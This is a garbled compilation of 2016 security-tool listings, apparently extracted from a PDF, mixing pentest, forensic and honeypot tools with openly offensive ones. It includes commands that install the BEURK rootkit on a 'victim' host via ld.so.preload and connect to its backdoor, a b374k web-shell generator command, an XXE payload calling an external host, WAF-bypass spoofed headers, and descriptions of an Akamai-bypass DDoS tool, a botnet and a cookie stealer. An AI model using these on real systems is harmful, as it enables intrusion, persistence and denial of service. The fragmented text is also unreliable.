2016 COMPILATION
To run:
if rpm distro
$ sudo yum install libcurl-devel
$ make
$./0d1n
Download0d1n
3VILTWINATTACKER - CREATE ROGUE WI-FI ACCESS
POINT AND SNOOPING ON THE TRAFFIC
Ubuntu
$ sudo apt-get install isc-dhcp-server
Kali linux
$ echo "deb http://ftp.de.debian.org/debian wheezy main "
>> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server
Fedora
$ sudo yum install dhcp
Tools Options:
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Download 3vilTwinAttacker
ACUNETIX CLAMPS DOWN ON COSTLY WEBSITE
SECURITY WITH ONLINE SOLUTION
as a virtual security
websites, including
and any additional
allowing you to fix
points in your IT
PTW attack
Fragmentation attack
DownloadAircrack-ng 1.2 RC 2
AIRCRACK-NG 1.2 RC 3 - WEP AND WPA-PSK KEYS
CRACKING PROGRAM
OSdep:
Add
missing
RADIOTAP_SUPPORT_OVERRIDES check.
DownloadAircrack-ng 1.2 RC 3
ANTICUCKOO - A TOOL TO DETECT AND CRASH
CUCKOO SANDBOX
Detection:
Cuckoo hooks detection (all kind of cuckoo hooks).
Suspicius data in own memory (without APIs, page
per page scanning).
Crash (Execute with arguments) (out of a sandbox
these args dont crash the program):
-c1: Modify the RET N instruction of a hooked API
with a higher value. Next call to API pushing more
args into stack. If the hooked API is called from the
Cuckoo Crash
DownloadAntiCuckoo
APPCRASHVIEW - VIEW APPLICATION CRASHES (.WER
FILES)
/
ProfilesFo
lder
<Folder>
/
ReportsF
older
<Folder>
/
ShowRep
ortQueue
<0 | 1>
/
ShowRep
ortArchive
<0 | 1>
/stext
<Filenam
e>
/stab
<Filenam
e>
/scomma
<Filenam
e>
/stabular
<Filenam
e>
/shtml
<Filenam
e>
/sverhtml
<Filenam
e>
/sxml
<Filenam
e>
/sort
<column>
/nosort
DownloadAppCrashView
APPIE - ANDROID PENTESTING PORTABLE INTEGRATED
ENVIRONMENT
DownloadAppie
APPUSE - ANDROID PENTEST PLATFORM UNIFIED
STANDALONE ENVIRONMENT
Easy toUse
DownloadAppUse
ARDT - AKAMAI REFLECTIVE DDOS TOOL
Attack the origin host behind the Akamai Edge hosts and
bypass the DDoS protection offered by Akamai services.
How it works...
What this tool does is, provided a list of Akamai edge nodes
and a valid cache missing request, produces multiple requests
that hit the origin server via the Akamai edge nodes. As you
can imagine, if you had 50 IP addresses under your control,
sending requests at around 20 per second, with 100,000
Akamai edge node list, and a request which resulting in 10KB
hitting the origin, if my calculations are correct, thats around
976MB/ps hitting the origin server, which is a hell of a lot of
traffic.
Finding Akamai Edge Nodes
This can be edited quite easily to find more, it then saves the
IPS automatically.
Download ARDT
ARES - PYTHON BOTNET AND BACKDOOR
INSTALLATION
SERVER
Download Ares
emulator.git
$ aptitude install python-dev
$ make python_module
$ python setup.py install
Usage
DownloadAsHttp
ATSCAN - SERVER, SITE AND DORK SCANNER
DESCRIPTION:
ATSCAN Version 2
Dork scanner.
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.
LIBRERIES TO INSTALL:
ap-get install libxml-simple-perl
SCREENSHOTS:
Download ATSCAN
AUTOBROWSER - CREATE REPORT AND SCREENSHOTS
OF HTTP/S BASED PORTS ON THE NETWORK
AutoBrowser is a tool written in python for penetration testers.
The purpose of this tool is to create report and screenshots of
http/s based ports on the network. It analyze Nmap Report or
scan with Nmap, Check the results with http/s request on each
host using headless web browser, Grab a screenshot of the
response page content.
This tool is designed for IT professionals to perform
penetration testing to scan and analyze NMAP results.
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
Examples
Scan with Nmap and Checks the results and create folder
by name project_name: python AutoBrowser.py scan
"192.168.1.1/24" -a="-sT -sV -T3" -p project_name
Get the argument details of analyze method: python
AutoBrowser.py analyze --help
Requirements:
Linux Installation:
1. sudo apt-get install python-pip python2.7-dev libxext-dev
python-qt4 qt4-dev-tools build-essential nmap
2. sudo pip install -r requirements.txt
MacOSx Installation:
1. Install Xcode Command Line Tools (AppStore)
2. ruby -e "$(curl -fsSL https://raw.github.com/
mxcl/homebrew/go)"
Windows Installation:
1. Install setuptools
2. Install pip
3. Install PyQt4
4. install Nmap
5. Open Command Prompt(cmd) as Administrator -> Goto
python folder -> Scripts (cd c:\Python27\Scripts)
6. pip install -r (Full Path To requirements.txt)
Download AutoBrowser
AUTOREAVER - MUTLIPLE ACCESS POINT TARGETS
ATTACK USING REAVER
AutoReaveris bash script which provides multiple access point
attack using reaver and BSSIDs list from a text file.
If processed AP reaches rate limit, script goes to another from
the list, and so forth.
HOW IT WORKS ?
For example:
AA:BB:CC:DD:EE:FF 1 MyWlan
00:BB:CC:DD:EE:FF 13 TpLink
00:22:33:DD:EE:FF 13 MyHomeSSID
REQUIREMENTS
USAGE EXAMPLE
Go to auto-reaver directory
cd ./auto-reaver
Make sure that scripts have x permissions for your user, if not
run
chmod 700 ./washAutoReaver
chmod 700 ./autoReaver
Wait for 1-2 minutes for wash to collect APs, and hit CTRL+C
ADDITIONAL FEATURES
AA:BB:CC:DD:EE:FF R MyWlan
DownloadAutoReaver
AUTORIZE - AUTOMATIC AUTHORIZATION
ENFORCEMENT DETECTION (EXTENSION FOR BURP
SUITE)
Installation
DownloadAutorize
AVCAESAR - MALWARE ANALYSIS ENGINE AND
REPOSITORY
Functionalities
Requirements :
Installation :
save as
-p password
protect
filename
with password
-t theme
use
theme to
-m modules
modules
strip
encode
with base64
-z [no|gzdeflate|gzencode|gzcompress]
compression (use only with -b)
-c [0-9]
level of
compression
-l
list
available modules
-k
list
available themes
example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b
-z gzcompress -c 9
Download B374K
BABUN - A WINDOWS SHELL YOU WILL LOVE!
Plugin-oriented architecture
Integrated oh-my-zsh
Features in 3 minutes
Cygwin
The core of Babun consists of a pre-configured Cygwin. Cygwin
is a great tool, but theres a lot of quirks and tricks that makes
you lose a lot of time to make it actually usable. Not only does
babun solve most of these problems, but also contains a lot of
vital packages, so that you can be productive from the very first
minute.
Package manager
Babun provides a package manager called pact. It is similar to
apt-get or yum. Pact enables installing/searching/upgrading
and deinstalling cygwin packages with no hassle at all. Just
invoke pact --help to check how to use it.
Shell
Babuns shell is tweaked in order to provide the best possible
user-experience. There are two shell types that are preconfigured and available right away - bash and zsh (zsh is the
default one). Babuns shell features:
syntax highlighting
UNIX tools
git-aware prompt
Console
Mintty is the console used in babun. It features an xterm-256
mode, nice fonts and simply looks great!
Proxying
Babun supports HTTP proxying out of the box. Just add the
address and the credentials of your HTTP proxy server to
the .babunrc file located in your home folder and execute
source .babunrc to enable HTTP proxying. SOCKS proxies
are not supported for now.
Developer tools
Babun provides many packages, convenience tools and scripts
that make your life much easier. The long list of features
includes:
programming languages (Python, Perl, etc.)
oh-my-zsh
Plugin architecture
Babun has a very small microkernel (cygwin, a couple of bash
scripts and a bit of a convention) and a plugin architecture on
the top of it. It means that almost everything is a plugin in the
babuns world! Not only does it structure babun in a clean way,
but also enables others to contribute small chunks of code.
Currently, babun comprises the following plugins:
cacert
core
git
oh-my-zsh
pact
cygdrive
dist
shell
Auto-update
Self-update is at the very heart of babun! Many Cygwin tools
are simple bash scripts - once you install them there is no
chance of getting the newer version in a smooth way. You
either delete the older version or overwrite it with the newest
one losing all the changes you have made in between.
Babun contains an auto-update feature which enables updating
both the microkernel, the plugins and even the underlying
cygwin. Files located in your home folder will never be deleted
nor overwritten which preserves your local config and
customizations.
Installer
Babun features an silent command-line installation script that
may be executed without admin rights on any Windows hosts.
Using babun
Setting up proxy
To setup proxy uncomment following lines in the .babunrc file
(%USER_HOME%\.babun\cygwin\home\USER\.babunrc)
# Uncomment this lines to set up your proxy
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost
Setting up git
--2014-03-30 19:34:38--
http://mirrors.kernel.org/
sourceware/cygwin//x86/release/arj/arj-3.10.22-1.tar.bz2
Resolving mirrors.kernel.org (mirrors.kernel.org)...
149.20.20.135, 149.20.4.71,
2001:4f8:1:10:0:1994:3:14, ...
Connecting to mirrors.kernel.org (mirrors.kernel.org)|
149.20.20.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 189944 (185K) [application/x-bzip2]
Saving to: `arj-3.10.22-1.tar.bz2'
100%[=======================================>] 189,944
193K/s
in 1.0s
pact --help
patterns
"pact describe <patterns>" to describe packages
matching patterns
"pact packageof <commands or files>" to locate parent
packages
"pact invalidate" to invalidate pact caches (setup.ini,
etc.)
Options:
--mirror, -m <url> : set mirror
--invalidate, -i
(setup.ini, etc.)
--force, -f : force the execution
--help
--version
The output contains two lines: the previous default shell and the
new default shell
Checking the configuration
babun check
~
Executing babun check
Prompt speed
[OK]
Connection check
[OK]
Update check
[OK]
Cygwin check
[OK]
babun check
~
Executing babun check
Prompt speed
[OK]
Connection check
[OK]
Update check
[OK]
Cygwin check
[OUTDATED]
It will check if there are problems with the speed of the git
prompt, if theres access to the Internet or finally if you are
running the newest version of babun.
The command will output hints if problems occur:
{ ~ } babun check
~
Executing babun check
Prompt speed
[SLOW]
[OK]
Update check
[OK]
Cygwin check
[OK]
# export http_proxy=http://user:password@server:port
# export https_proxy=$http_proxy
# export ftp_proxy=$http_proxy
# export no_proxy=localhost
Updating babun
To update babun to the newest version execute:
babun update
Startup screen
Shell prompt
Babun update
DownloadBabun
BACKBOX LINUX 4.2 - UBUNTU-BASED LINUX
System requirements
Upgrade instructions
System requirements
Upgrade instructions
DownloadBacula
BEESWARM - ACTIVE IDS MADE EASY
Download Beeswarm
DownloadBetterCap
BEURK - EXPERIMENTAL UNIX ROOTKIT
BEURK is an userland preload rootkit for GNU/Linux, heavily
focused around anti-debugging and anti-detection.
NOTE:BEURKis a recursive acronym
forBEURKExperimentalUnixRootKit
Features
Upcoming features
Usage
Compile
git clone https://github.com/unix-thrust/beurk.git
cd beurk
make
Install
scp libselinux.so root@victim.com:/lib/
ssh root@victim.com 'echo /lib/libselinux.so >> /etc/
ld.so.preload'
Enjoy !
./client.py victim_ip:port # connect with furtive
backdoor
Dependencies
Download Beurk
BLACKARCH LINUX V2015.07.31 - PENETRATION
TESTING DISTRIBUTION
GetProcAdress, etc.)
Security cookie initialization
C++/CLI images are supported
Image unloading
Increase reference counter for import libraries in case
of manual import mapping
Cyclic dependencies are handled properly
Driver features
Allocate/free/protect user memory
Read/write user and kernel memory
Disable permanent DEP for WOW64 processes
Change process protection flag
Change handle access rights
Remap process memory
Hiding allocated user-mode memory
User-mode dll injection and manual mapping
Manual mapping of drivers
DownloadBlackbone
BLUEMAHO - BLUETOOTH SECURITY TESTING SUITE
Tools:
atshell.c by Bastian Ballmann (modified attest.c by Marcel
Holtmann)
bccmd by Marcel Holtmann
bdaddr.c by Marcel Holtmann
bluetracker.py by smiley
carwhisperer v0.2 by Martin Herfurt
psm_scan and rfcomm_scan from bt_audit-0.1.1 by Collin
R. Mulliner
BSS (Bluetooth Stack Smasher) v0.8 by Pierre Betouin
btftp v0.1 by Marcel Holtmann
btobex v0.1 by Marcel Holtmann
greenplaque v1.5 by digitalmunition.com
L2CAP packetgenerator by Bastian Ballmann
obex stress tests 0.1
redfang v2.50 by Ollie Whitehouse
ussp-push v0.10 by Davide Libenzi
exploits/attacks:
Bluebugger v0.1 by Martin J. Muench
bluePIMp by Kevin Finisterre
BlueZ hcidump v1.29 DoS PoC by Pierre Betouin
helomoto by Adam Laurie
hidattack v0.1 by Collin R. Mulliner
Mode 3 abuse attack
Nokia N70 l2cap packet DoS PoC Pierre Betouin
opush abuse (prompts flood) DoS attack
Sony-Ericsson reset display PoC by Pierre Betouin
you can add your own tools by editing 'exploits/exploits.lst'
and 'tools/tools.lst'
Requirements
Download BlueMaho
BLUESCREENVIEW - BLUE SCREEN OF DEATH (STOP
ERROR) INFORMATION IN DUMP FILES
Using BlueScreenView
/
LoadFrom
<Source>
/
MiniDump
Folder
<Folder>
/
SingleDu
mpFile
<Filename
>
/
Computer
sFile
<Filename
>
/
LowerPan
eMode <1
- 3>
/stext
<Filename
>
/stab
<Filename
>
/scomma
<Filename
>
/stabular
<Filename
>
/shtml
<Filename
>
/sverhtml
<Filename
>
/sxml
<Filename
>
/sort
<column>
/nosort
Download BlueScreenView
BLUTO - DNS RECON, DNS ZONE TRANSFER, AND EMAIL
ENUMERATION
Email Enumeration
The target domain is queried for MX and NS records. Subdomains are passively gathered via NetCraft. The target
domain NS records are each queried for potential Zone
Transfers. If none of them gives up their spinach, Bluto will
brute force subdomains using parallel sub processing on the
top 20000 of the 'The Alexa Top 1 Million subdomains'.
NetCraft results are presented individually and are then
compared to the brute force results, any duplications are
(1) Mac and Kali users can simply use the following command
to download and install pip.
curl https://bootstrap.pypa.io/get-pip.py -o - | python
(2) You should now be able to execute 'bluto' from any working
directory in any terminal.
bluto
Upgrade Instructions
--upgrade
Download Bluto
BOHATEI - FLEXIBLE AND ELASTIC DDOS DEFENSE
The frontend folder contains the required files for the web
interface.
For the experiments performed, we used a set of VM images
that contain implementations of the strategy graphs for each
type of attack (SYN Flood, UDP Flood, DNS Amplification and
Elephant Flow). Those images will become available at a later
stage. The tools that were used for those strategy graphs are
the following:
Bro
Snort
Balancer
Iptables
Iperf
Custom scripts to simulate the attacks
Bohatei Paper
Bohatei Slides
Video
DownloadBohatei
BRUTEX - AUTOMATICALLY BRUTE FORCE ALL
SERVICES RUNNING ON A TARGET
DEPENDENCIES
NMap
Hydra
Wfuzz
SNMPWalk
DNSDict
Download BruteX
BTPROXY - MAN IN THE MIDDLE ANALYSIS TOOL FOR
BLUETOOTH
Tested Devices
Pebble Steel smart watch
Moto 360 smart watch
OBDLink OBD-II Bluetooth Dongle
Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp
(at) vt (dot) edu.
Dependencies
Need at least 1 Bluetooth card (either USB or internal).
Installation
sudo python setup.py install
Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
Where the master is typically the phone and the slave mac
address is typically the other peripherial device (smart watch,
headphones, keyboard, obd2 dongle, etc).
The master is the device the sends the connection request and
the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master
connects to the proxy device, you will be able to see traffic and
modify it.
How to find the BT MAC Address?
Well, you can look it up in the settings usually for a phone. The
most robost way is to put the device in advertising mode and
scan for it.
There are two ways to scan for devices: scanning and inquiring.
hcitool can be used to do this:
hcitool scan
hcitool inq
Usage
Some devices may restrict connecting based on the name,
class, or address of another bluetooth device.
So the program will lookup those three properties of the target
devices to be proxied, and then clone them onto the proxying
adapter(s).
Then it will first try connecting to the slave device from the
cloned master adaptor. It will make a socket for each service
hosted by the slave and relay traffic for each one
independently.
After the slave is connected, the cloned slave adaptor will be
set to be listening for a connection from the master. At this
point, the real master device should connect to the adaptor.
After the master connects, the proxied connection is complete.
Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use
one adapter, then only the slave device will be cloned. Both
devices will be cloned if 2 adapters are used; this might be
necessary for more restrictive Bluetooth devices.
Advanced Usage
Manipulation of the traffic can be handled via python by passing
an inline script. Just implement the master_cb and slave_cb
callback functions. This are called upon receiving data and the
returned data is sent back out to the corresponding device.
# replace.py
def master_cb(req):
"""
Received something from master, about to be sent
to slave.
"""
print '<< ', repr(req)
open('mastermessages.log', 'a+b').write(req)
return req
def slave_cb(res):
"""
Same as above but it's from slave about to be
sent to master
"""
print '>> ', repr(res)
open('slavemessages.log', 'a+b').write(res)
return res
Download Btproxy
BURP SUITE PROFESSIONAL 1.6.26 - THE LEADING
TOOLKIT FOR WEB APPLICATION SECURITY TESTING
v1.6.15
This release introduces a brand new feature: Burp
Collaborator.
Burp Collaborator is an external service that Burp can use to
help discover many kinds of vulnerabilities, and has the
potential to revolutionize web security testing. In the coming
months, we will be adding many exciting new capabilities to
functionality.
An advanced web application Scanner, for automating the
detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized
attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual
requests.
A Sequencer tool, for testing the randomness of session
tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own
plugins, to perform complex and highly customized tasks
within Burp.
v1.6.23
This release adds a new scan check for external service
interaction and out-of-band resource load via injected XML
doctype tags containing entity parameters. Burp now sends
payloads like:
<?xml version='1.0' standalone='no'?><!DOCTYPE
foo [<!ENTITY % f5a30 SYSTEM "http://
u1w9aaozql7z31394loost.burpcollaborator.net">
%f5a30; ]>
and reports an appropriate issue based on any observed
interactions (DNS or HTTP) that reach the Burp Collaborator
server.
the contents of their pages dynamically. It also provides a bidirectional JavaScript bridge API which allows users to create
quick one-off BurpSuite plugin prototypes which can interact
directly with the DOM and Burp's extender API.
System Requirements
Download Burpkit
BWA - OWASP BROKEN WEB APPLICATIONS PROJECT
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Usage
Steps include:
1. Add extension to burp
2. Create a session handling rule in Burp that invokes this
extension
3. Modify the scope to include applicable tools and URLs
4. Configure the bypass options on the "Bypass WAF" tab
5. Test away
Read morehere.
Features
2.
3.
4.
5.
6.
7.
DownloadBypassWAF
CAPTIPPER - MALICIOUS HTTP TRAFFIC EXPLORER
TOOL
Download CapTipper
CENOCIPHER - EASY-TO-USE, END-TO-END ENCRYPTED
COMMUNICATIONS TOOL
FEATURES AT A GLANCE
TECHNICAL DETAILS
DownloadCenoCipher
CHEAT - CREATE AND VIEW INTERACTIVE
CHEATSHEETS ON THE COMMAND-LINE
Using pip
sudo pip install cheat
Using homebrew
brew install cheat
Manually
First install the required python dependencies with:
sudo pip install docopt pygments
Modifying Cheatsheets
Download Cheat
CHROME AUTOFILL VIEWER - TOOL TO VIEW OR DELETE
AUTOCOMPLETE DATA FROM GOOGLE CHROME
BROWSER
How to Use?
interface.
Here are the brief usage details
Launch ChromeAutofillViewer on your system
By default it will automatically find and display the autofill
file from default profile location of Chrome. You can also
select the desired file manually.
Next click on 'Show All' button and all stored Autofill data
will be displayed in the list as shown in screenshot 1
below.
If you want to remove all the entries, click on 'Delete All'
button below.
Finally you can save all displayed entries to HTML/XML/
TEXT/CSV file by clicking on 'Export' button and then
select the type of file from the drop down box of 'Save File
Dialog'.
Starting from version 1.05, you can also read the passwords
stored by Chrome Web browser from an external profile in your
current operating system or from another external drive (For
example: from a dead system that cannot boot anymore). In
order to use this feature, you must know the last logged-on
password used for this profile, because the passwords are
encrypted with the SHA hash of the log-on password, and
without that hash, the passwords cannot be decrypted.
You can use this feature from the UI, by selecting the
'Advanced Options' in the File menu, or from command-line, by
using /external parameter. The user profile path should be
something like "C:\Documents and Settings\admin" in Windows
XP/2003 or "C:\users\myuser" in Windows Vista/2008.
Command-Line Options
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/skeepass <Filename>
DownloadChromePass
CMSMAP - SCANNER TO DETECT SECURITY FLAWS OF
THE MOST POPULAR CMSS (WORDPRESS, JOOMLA AND
DRUPAL)
Usage
abc.test.com:8080/')
-v, --verbose
-T, --threads
-u, --usr
username or file
-p, --psw
password or file
-i, --input
-k, --crack
-w, --wordlist
-U, --update
(J)oomla or (D)rupal
-F, --fullscan
cmsmap.py -k hashes.txt
Download CMSmap
CODETAINER - A DOCKER CONTAINER IN YOUR
BROWSER
godep
make
Configuring codetainer
certs"
# DockerCertPath = "/path/to/certs"
# Database path (optional, default is ~/.codetainer/
codetainer.db)
# DatabasePath = "/path/to/codetainer.db"
3000
3. <html>
4. <head>
5.
<meta charset="UTF-8">
6.
<title>lsof tutorial</title>
7.
8.
<script src="http://code.jquery.com/
jquery-1.10.1.min.js"></script>
9.
<script src="/javascripts/codetainer.js"></script>
10.
<script src="/javascripts/lsof.js"></script>
11. </head>
12. <body>
13.
14. </body>
15. </html>
16. Run the javascript to load the codetainer iframe from the
codetainer API server (supply data-container as the id
of codetainer on the div, or supplycodetainer in the
constructor options).
$('#terminal').codetainer({
terminalOnly: false,
// set to true
// replace with
height: "100%",
});
Download Codetainer
COLLECTION OF AWESOME HONEYPOTS
HONEYPOTS
Database Honeypots
Elastic honey - A Simple Elasticsearch Honeypot
mysql - A mysql honeypot, still very very early stage
A framework for nosql databases ( only redis for now)
- The NoSQL Honeypot Framework
ESPot - ElasticSearch Honeypot
Web honeypots
Glastopf - Web Application Honeypot
phpmyadmin_honeypot - - A simple and effective
phpMyAdmin honeypot
servlet - Web application Honeypot
Nodepot - A nodejs web application honeypot
basic-auth-pot bap - http Basic Authentication
honeyPot
Shadow Daemon - A modular Web Application
Firewall / High-Interaction Honeypot for PHP, Perl &
Python apps
Servletpot - Web application Honeypot
Google Hack Honeypot - designed to provide
reconnaissance against attackers that use search
engines as a hacking tool against your resources.
smart-honeypot - PHP Script demonstrating a smart
honey pot
HonnyPotter - A WordPress login honeypot for
collection and analysis of failed login attempts.
wp-smart-honeypot - WordPress plugin to reduce
comment spam with a smarter honeypot
wordpot - A WordPress Honeypot
Bukkit Honeypot Honeypot - A honeypot plugin for
Bukkit
Laravel Application Honeypot - Honeypot - Simple
spam prevention package for Laravel applications
stack-honeypot - Inserts a trap for spam bots into
responses
EoHoneypotBundle - Honeypot type for Symfony2
forms
shockpot - WebApp Honeypot for detecting Shell
Shock exploit attempts
Service Honeypots
Kippo - Medium interaction SSH honeypot
honeyntp - NTP logger/honeypot
honeypot-camera - observation camera honeypot
troje - a honeypot built around lxc containers. It will
run each connection with the service within a
seperate lxc container.
slipm-honeypot - A simple low-interaction port
monitoring honeypot
HoneyPy - A low interaction honeypot
Ensnare - Easy to deploy Ruby honeypot
RDPy - A Microsoft Remote Desktop Protocol (RDP)
honeypot in python
Anti-honeypot stuff
kippo_detect - This is not a honeypot, but it detects
kippo. (This guy has lots of more interesting stuff)
ICS/SCADA honeypots
Conpot - ICS/SCADA honeypot
scada-honeynet - mimics many of the services from a
popular PLC and better helps SCADA researchers
understand potential risks of exposed control system
devices
SCADA honeynet - Building Honeypots for Industrial
Networks
Deployment
Dionaea and EC2 in 20 Minutes - a tutorial on setting
up Dionaea on an EC2 instance
honeypotpi - Script for turning a Raspberry Pi into a
Honey Pot Pi
Data Analysis
Kippo-Graph - a full featured script to visualize
honeypot database
Sebek in QEMU
Qebek - QEMU based Sebek. As Sebek, it is data
capture tool for high interaction honeypot
Malware Simulator
imalse - Integrated MALware Simulator and Emulator
Distributed sensor deployment
Smarthoneypot - custom honeypot intelligence
system that is simple to deploy and easy to manage
Modern Honey Network - Multi-snort and honeypot
sensor management, uses a network of VMs, small
footprint SNORT installations, stealthy dionaeas, and
a centralized server for management
ADHD - Active Defense Harbinger Distribution
(ADHD) is a Linux distro based on Ubuntu LTS. It
comes with many tools aimed at active defense
preinstalled and configured
Network Analysis Tool
Tracexploit - replay network packets
Log anonymizer
LogAnon - log anonymization library that helps
having anonymous logs consistent between logs and
network captures
server
Honeysink - open source network sinkhole that
provides a mechanism for detection and prevention
of malicious traffic on a given network
Botnet traffic detection
dnsMole - analyse dns traffic, and to potentionaly
detect botnet C&C server and infected hosts
Low interaction honeypot (router back door)
Honeypot-32764 - Honeypot for router backdoor
(TCP 32764)
honeynet farm traffic redirector
Honeymole - eploy multiple sensors that redirect
traffic to a centralized collection of honeypots
HTTPS Proxy
mitmproxy - allows traffic flows to be intercepted,
inspected, modified and replayed
spamtrap
SendMeSpamIDS.py Simple SMTP fetch all IDS and
analyzer
System instrumentation
Sysdig - open source, system-level exploration:
capture system state and activity from a running
Linux instance, then save, filter and analyze
Honeypot for USB-spreading malware
Ghost-usb - honeypot for malware that propagates
via USB storage devices
Data Collection
Kippo2MySQL - extracts some very basic stats from
Kippos text-based log files (a mess to analyze!) and
inserts them in a MySQL database
Kippo2ElasticSearch - Python script to transfer data
from a Kippo SSH honeypot MySQL database to an
ElasticSearch instance (server or cluster)
Passive network audit framework parser
pnaf - Passive Network Audit Framework
VM Introspection
VIX virtual machine introspection toolkit - VMI toolkit
for Xen, called Virtual Introspection for Xen (VIX)
vmscope - Monitoring of VM-based High-Interaction
Honeypots
vmitools - C library with Python bindings that makes it
easy to monitor the low-level details of a running
virtual machine
Binary debugger
Hexgolems - Schem Debugger Frontend - A
debugger frontend
Hexgolems - Pint Debugger Backend - A debugger
backend and LUA wrapper for PIN
Mobile Analysis Tool
SurfIDS
Automated malware analysis system
Cuckoo
Anubis
Hybrid Analysis
Low interaction
mwcollectd
Low interaction honeypot on USB stick
Honeystick
Honeypot extensions to Wireshark
Whireshark Extensions
Data Analysis Tool
HpfeedsHoneyGraph
Acapulco
Telephony honeypot
Zapping Rachel
Client
Pwnypot
MonkeySpider
Capture-HPC-NG
Wepawet
URLQuery
Trigona
Thug
Shelia
PhoneyC
Jsunpack-n
HoneyC
HoneyBOT
CWSandbox / GFI Sandbox
Capture-HPC-Linux
Capture-HPC
Andrubis
Visual analysis for network traffic
ovizart
Binary Management and Analysis Framework
Viper
Honeypot
Single-honeypot
Honeyd For Windows
IMHoneypot
Deception Toolkit
PDF document inspector
peepdf
Distribution system
Thug Distributed Task Queuing
HoneyClient Management
HoneyWeb
Network Analysis
HoneyProxy
Hybrid low/high interaction honeypot
HoneyBrid
Sebek on Xen
xebek
SSH Honeypot
Kojoney
Cowrie
Glastopf data analysis
Glastopf Analytics
Distributed sensor project
DShield Web Honeypot Project
Distributed Web Honeypot Project
a pcap analyzer
Honeysnap
Client Web crawler
HoneySpider Network
network traffic redirector
Honeywall
Honeypot Distribution with mixed content
HoneyDrive
Honeypot sensor
Dragon Research Group Distro
Network analysis
Quechua
Sebek data visualization
Sebek Dataviz
SIP Server
Artemnesia VoIP
Botnet C2 monitoring
botsnoopd
low interaction
mysqlpot
Malware collection
Honeybow
HONEYD TOOLS
Honeyd plugin
Honeycomb
Honeyd viewer
Honeyview
Honeyd to MySQL connector
Honeyd2MySQL
A script to visualize statistics from honeyd
Honeyd-Viz
Honeyd UI
Honeyd configuration GUI - application used to
configure the honeyd daemon and generate
configuration files
Honeyd stats
Honeydsum.pl
Sandbox
RFISandbox - a PHP 5.x script sandbox built on top
of funcall
dorothy2 - A malware/botnet analysis framework
written in Ruby
COMODO automated sandbox
Argos - An emulator for capturing zero-day attacks
Sandbox-as-a-Service
malwr.com - free malware analysis service and
community
detux.org - Multiplatform Linux Sandbox
Joebox Cloud - analyzes the behavior of malicious
files including PEs, PDFs, DOCs, PPTs, XLSs,
APKs, URLs and MachOs on Windows, Android and
Mac OS X for suspicious activities
DATA TOOLS
Front Ends
Tango - Honeypot Intelligence with Splunk
Django-kippo - Django App for kippo SSH Honeypot
Wordpot-Frontend - a full featured script to visualize
statistics from a Wordpot honeypot -ShockpotFrontend - a full featured script to visualize statistics
from a Shockpot honeypot
Visualization
Source
COMMIX - AUTOMATED ALL-IN-ONE OS COMMAND
Usage
--install
--version
--update
and exit.
Target
This options has to be provided, to define the target URL.
--url=URL
Target URL.
--url-reload
execution.
Request
These options can be used, to specify how to connect to the
target
URL.
--host=HOST
--referer=REFERER
--user-agent=AGENT
--cookie=COOKIE
--headers=HEADERS
'Header1:Value1\nHeader2:Value2').
--proxy=PROXY
'127.0.0.1:8080').
--auth-url=AUTH_..
--auth-data=AUTH..
--auth-cred=AUTH..
(e.g.
'admin:admin').
Injection
These options can be used, to specify which parameters to
inject and
to provide custom injection payloads.
--data=DATA
'INJECT_HERE' tag).
--suffix=SUFFIX
--prefix=PREFIX
--technique=TECH
technique : 'classic',
'eval-based', 'time-based' or 'filebased'.
--maxlen=MAXLEN
based technique
(Default: 10000 chars).
--delay=DELAY
file-based
techniques (Default: 1 sec).
--base64
files directory.
--icmp-exfil=IP_..
(e.g.
'ip_src=192.168.178.1,ip_dst=192.168.178.3').
Usage Examples
DownloadCommix
COOKIES MANAGER - SIMPLE COOKIE STEALER
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
DownloadCookies Manager
COOKIESCANNER - TOOL TO CHECK THE COOKIE FLAG
FOR A MULTIPLE SITES
FEATURES:
Multiple options for output (and export using >). xml, json,
csv, grepable
Check the flags in multiple sites by a file input (one per
line). This is very useful for pentesters when they want
check the flags in multiple sites.
Google search. Search in google all subdomains and
check the cookies for each domain.
Colors for the normal output.
USAGE
Usage: cookiescanner.py [options]
Example: ./cookiescanner.py -i ips.txt
Options:
-h, --help
-i INPUT, --input=INPUT
File input with the list of
webservers
-I, --info
More info
-u URL, --url=URL
URL
-f FORMAT, --format=FORMAT
Output format (json, xml, csv,
normal, grepable)
--nocolor
format output)
-g GOOGLE, --google=GOOGLE
Search in google by domain
REQUIREMENTS
requests >= 2.8.1
BeautifulSoup >= 4.2.1
INSTALL REQUIREMENTS
pip3 install --upgrade -r requirements.txt
DownloadCookiescanner
COWRIE - SSH HONEYPOT
Software required:
An operating system (tested on Debian, CentOS,
FreeBSD and Windows 7)
Python 2.5+
Twisted 8.0+
PyCrypto
pyasn1
Zope Interface
Files of interest:
DownloadCowrie
CRACKMAPEXEC - A SWISS ARMY KNIFE FOR
PENTESTING WINDOWS/ACTIVE DIRECTORY
ENVIRONMENTS
___.
_______
______
||
\/
,----'|
,----'
|_)
/
|
|
|
/
/
/_\
_______ ___
||
____|\
___
|/
\ /
/ |
,----'|
'
| |
|__
|__
|_)
/
/ |
/_\
___/
__|
|
>
<
<
|
|
`----.|
|\
_____
____ |
__
|\/|
______
.______
____| /
__|
___
___
`----.
\----. /
\
_____
|
\
|
`----.|
|____
\______|| _| `._____|/__/
__|
|__| /__/
\__\
\__\ | _|
\______||__|\__\ |
